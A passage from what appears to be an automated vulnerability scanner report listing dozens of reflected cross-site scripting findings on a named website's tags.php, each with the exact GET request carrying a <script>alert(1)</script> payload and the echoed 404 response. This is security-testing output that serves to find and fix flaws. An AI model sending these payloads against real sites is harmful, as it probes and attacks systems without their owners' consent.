<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php87697<script>alert(1)</script>8d5e0d3d656&ltr=N was not found on this server.</p>
...[SNIP]...

2.4726. http://www.resellerbase.com/tags.php<r=N [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=N

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a1a57<script>alert(1)</script>b68ea713393 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=N?a1a57<script>alert(1)</script>b68ea713393=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=N?a1a57<script>alert(1)</script>b68ea713393=1 was not found on this server.</p>
...[SNIP]...

2.4727. http://www.resellerbase.com/tags.php<r=O [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=O

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5272<script>alert(1)</script>14965101489 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa5272<script>alert(1)</script>14965101489&ltr=O HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa5272<script>alert(1)</script>14965101489&ltr=O was not found on this server.</p>
...[SNIP]...

2.4728. http://www.resellerbase.com/tags.php<r=O [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=O

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7624a<script>alert(1)</script>8a83e27d51c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=O?7624a<script>alert(1)</script>8a83e27d51c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=O?7624a<script>alert(1)</script>8a83e27d51c=1 was not found on this server.</p>
...[SNIP]...

2.4729. http://www.resellerbase.com/tags.php<r=P [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=P

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a2983<script>alert(1)</script>d8966e61d86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa2983<script>alert(1)</script>d8966e61d86&ltr=P HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa2983<script>alert(1)</script>d8966e61d86&ltr=P was not found on this server.</p>
...[SNIP]...

2.4730. http://www.resellerbase.com/tags.php<r=P [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=P

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4cfeb<script>alert(1)</script>dc27487440 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=P?4cfeb<script>alert(1)</script>dc27487440=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=P?4cfeb<script>alert(1)</script>dc27487440=1 was not found on this server.</p>
...[SNIP]...

2.4731. http://www.resellerbase.com/tags.php<r=Q [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=Q

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad6a1<script>alert(1)</script>62977986520 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpad6a1<script>alert(1)</script>62977986520&ltr=Q HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpad6a1<script>alert(1)</script>62977986520&ltr=Q was not found on this server.</p>
...[SNIP]...

2.4732. http://www.resellerbase.com/tags.php<r=Q [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=Q

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cea83<script>alert(1)</script>ea4990b211b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=Q?cea83<script>alert(1)</script>ea4990b211b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=Q?cea83<script>alert(1)</script>ea4990b211b=1 was not found on this server.</p>
...[SNIP]...

2.4733. http://www.resellerbase.com/tags.php<r=R [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=R

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92d0e<script>alert(1)</script>1c7935ffb32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php92d0e<script>alert(1)</script>1c7935ffb32&ltr=R HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php92d0e<script>alert(1)</script>1c7935ffb32&ltr=R was not found on this server.</p>
...[SNIP]...

2.4734. http://www.resellerbase.com/tags.php<r=R [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=R

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 57685<script>alert(1)</script>5ed3ec2c278 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=R?57685<script>alert(1)</script>5ed3ec2c278=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=R?57685<script>alert(1)</script>5ed3ec2c278=1 was not found on this server.</p>
...[SNIP]...

2.4735. http://www.resellerbase.com/tags.php<r=S [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=S

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f005<script>alert(1)</script>d3752564a83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php9f005<script>alert(1)</script>d3752564a83&ltr=S HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php9f005<script>alert(1)</script>d3752564a83&ltr=S was not found on this server.</p>
...[SNIP]...

2.4736. http://www.resellerbase.com/tags.php<r=S [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=S

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d2760<script>alert(1)</script>e6daf3e9bb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=S?d2760<script>alert(1)</script>e6daf3e9bb9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=S?d2760<script>alert(1)</script>e6daf3e9bb9=1 was not found on this server.</p>
...[SNIP]...

2.4737. http://www.resellerbase.com/tags.php<r=T [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=T

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e4cf<script>alert(1)</script>172edfee609 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php7e4cf<script>alert(1)</script>172edfee609&ltr=T HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php7e4cf<script>alert(1)</script>172edfee609&ltr=T was not found on this server.</p>
...[SNIP]...

2.4738. http://www.resellerbase.com/tags.php<r=T [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=T

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6cd88<script>alert(1)</script>3be4f8af5bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=T?6cd88<script>alert(1)</script>3be4f8af5bc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=T?6cd88<script>alert(1)</script>3be4f8af5bc=1 was not found on this server.</p>
...[SNIP]...

2.4739. http://www.resellerbase.com/tags.php<r=U [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=U

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c951f<script>alert(1)</script>07ce89bfc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpc951f<script>alert(1)</script>07ce89bfc9&ltr=U HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpc951f<script>alert(1)</script>07ce89bfc9&ltr=U was not found on this server.</p>
...[SNIP]...

2.4740. http://www.resellerbase.com/tags.php<r=U [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=U

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 39fc7<script>alert(1)</script>8ca781e8c52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=U?39fc7<script>alert(1)</script>8ca781e8c52=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=U?39fc7<script>alert(1)</script>8ca781e8c52=1 was not found on this server.</p>
...[SNIP]...

2.4741. http://www.resellerbase.com/tags.php<r=V [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=V

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a6e02<script>alert(1)</script>2848be69218 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa6e02<script>alert(1)</script>2848be69218&ltr=V HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa6e02<script>alert(1)</script>2848be69218&ltr=V was not found on this server.</p>
...[SNIP]...

2.4742. http://www.resellerbase.com/tags.php<r=V [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=V

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cd9ce<script>alert(1)</script>2c7e83b3d81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=V?cd9ce<script>alert(1)</script>2c7e83b3d81=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=V?cd9ce<script>alert(1)</script>2c7e83b3d81=1 was not found on this server.</p>
...[SNIP]...

2.4743. http://www.resellerbase.com/tags.php<r=W [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=W

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 83bfe<script>alert(1)</script>35c446f69b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php83bfe<script>alert(1)</script>35c446f69b6&ltr=W HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php83bfe<script>alert(1)</script>35c446f69b6&ltr=W was not found on this server.</p>
...[SNIP]...

2.4744. http://www.resellerbase.com/tags.php<r=W [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=W

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 27ce2<script>alert(1)</script>779f4c60000 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=W?27ce2<script>alert(1)</script>779f4c60000=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=W?27ce2<script>alert(1)</script>779f4c60000=1 was not found on this server.</p>
...[SNIP]...

2.4745. http://www.resellerbase.com/tags.php<r=X [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=X

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61c15<script>alert(1)</script>74aeb8166dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php61c15<script>alert(1)</script>74aeb8166dc&ltr=X HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
